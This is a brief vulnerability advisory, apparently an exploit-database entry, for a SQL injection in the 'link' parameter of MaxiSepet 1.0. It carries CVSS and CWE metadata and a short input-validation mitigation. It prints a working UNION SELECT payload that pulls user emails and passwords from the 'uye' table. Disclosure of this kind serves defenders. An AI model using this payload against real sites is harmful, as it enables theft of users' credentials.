vendor:
MaxiSepet
by:
nukedx
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: MaxiSepet
Affected Version From: 1.0
Affected Version To: 1.0
Patch Exists: YES
Related CWE: N/A
CPE: a:maxisepet:maxisepet:1.0
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006
MaxiSepet <= 1.0 (link) SQL Injection Vulnerability
Parameter link in MaxiSepet <= 1.0 is not sanitized properly, allowing attackers to inject malicious SQL queries. An example of such a query is '-1 UNION SELECT concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC'
Mitigation:
Input validation should be used to prevent SQL injection attacks.